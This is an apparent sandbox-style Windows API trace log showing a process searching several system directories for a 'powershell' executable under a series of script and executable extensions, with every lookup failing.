	[0899.212] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.212] SetErrorMode (uMode=0x1) returned 0x1
	[0899.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0899.212] SetErrorMode (uMode=0x1) returned 0x1
	[0899.212] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.213] SetErrorMode (uMode=0x1) returned 0x1
	[0899.213] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.213] SetErrorMode (uMode=0x1) returned 0x1
	[0899.213] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.213] SetErrorMode (uMode=0x1) returned 0x1
	[0899.214] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.214] SetErrorMode (uMode=0x1) returned 0x1
	[0899.214] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.214] SetErrorMode (uMode=0x1) returned 0x1
	[0899.214] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.214] SetErrorMode (uMode=0x1) returned 0x1
	[0899.214] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.215] SetErrorMode (uMode=0x1) returned 0x1
	[0899.215] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.215] SetErrorMode (uMode=0x1) returned 0x1
	[0899.215] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.215] SetErrorMode (uMode=0x1) returned 0x1
	[0899.216] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.216] SetErrorMode (uMode=0x1) returned 0x1
	[0899.216] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.216] SetErrorMode (uMode=0x1) returned 0x1
	[0899.216] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.216] SetErrorMode (uMode=0x1) returned 0x1
	[0899.217] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.217] SetErrorMode (uMode=0x1) returned 0x1
	[0899.217] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.217] SetErrorMode (uMode=0x1) returned 0x1
	[0899.217] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.217] SetErrorMode (uMode=0x1) returned 0x1
	[0899.218] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.218] SetErrorMode (uMode=0x1) returned 0x1
	[0899.218] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.218] SetErrorMode (uMode=0x1) returned 0x1
	[0899.219] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.219] SetErrorMode (uMode=0x1) returned 0x1
	[0899.219] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.219] SetErrorMode (uMode=0x1) returned 0x1
	[0899.219] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.219] SetErrorMode (uMode=0x1) returned 0x1
	[0899.220] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.220] SetErrorMode (uMode=0x1) returned 0x1
	[0899.220] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.220] SetErrorMode (uMode=0x1) returned 0x1
	[0899.220] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.220] SetErrorMode (uMode=0x1) returned 0x1
	[0899.221] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.221] SetErrorMode (uMode=0x1) returned 0x1
	[0899.221] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.221] SetErrorMode (uMode=0x1) returned 0x1
	[0899.221] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.221] SetErrorMode (uMode=0x1) returned 0x1
	[0899.222] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.222] SetErrorMode (uMode=0x1) returned 0x1
	[0899.222] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.222] SetErrorMode (uMode=0x1) returned 0x1
	[0899.222] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.223] SetErrorMode (uMode=0x1) returned 0x1
	[0899.223] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0899.223] SetErrorMode (uMode=0x1) returned 0x1
	[0899.223] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.223] SetErrorMode (uMode=0x1) returned 0x1
	[0899.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.224] SetErrorMode (uMode=0x1) returned 0x1
	[0899.224] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.224] SetErrorMode (uMode=0x1) returned 0x1
	[0899.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.224] SetErrorMode (uMode=0x1) returned 0x1
	[0899.225] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.225] SetErrorMode (uMode=0x1) returned 0x1
	[0899.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.225] SetErrorMode (uMode=0x1) returned 0x1
	[0899.225] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.226] SetErrorMode (uMode=0x1) returned 0x1
	[0899.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.226] SetErrorMode (uMode=0x1) returned 0x1
	[0899.226] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.226] SetErrorMode (uMode=0x1) returned 0x1
	[0899.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.227] SetErrorMode (uMode=0x1) returned 0x1
	[0899.227] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.227] SetErrorMode (uMode=0x1) returned 0x1
	[0899.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.227] SetErrorMode (uMode=0x1) returned 0x1
	[0899.228] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.228] SetErrorMode (uMode=0x1) returned 0x1
	[0899.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.228] SetErrorMode (uMode=0x1) returned 0x1
	[0899.228] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.228] SetErrorMode (uMode=0x1) returned 0x1
	[0899.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.229] SetErrorMode (uMode=0x1) returned 0x1
	[0899.229] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.229] SetErrorMode (uMode=0x1) returned 0x1
	[0899.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.229] SetErrorMode (uMode=0x1) returned 0x1
	[0899.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.230] SetErrorMode (uMode=0x1) returned 0x1
	[0899.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.230] SetErrorMode (uMode=0x1) returned 0x1
	[0899.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.231] SetErrorMode (uMode=0x1) returned 0x1
	[0899.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.231] SetErrorMode (uMode=0x1) returned 0x1
	[0899.231] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.231] SetErrorMode (uMode=0x1) returned 0x1
	[0899.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.232] SetErrorMode (uMode=0x1) returned 0x1
	[0899.232] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.232] SetErrorMode (uMode=0x1) returned 0x1
	[0899.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.232] SetErrorMode (uMode=0x1) returned 0x1
	[0899.232] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.233] SetErrorMode (uMode=0x1) returned 0x1
	[0899.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.233] SetErrorMode (uMode=0x1) returned 0x1
	[0899.233] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.233] SetErrorMode (uMode=0x1) returned 0x1
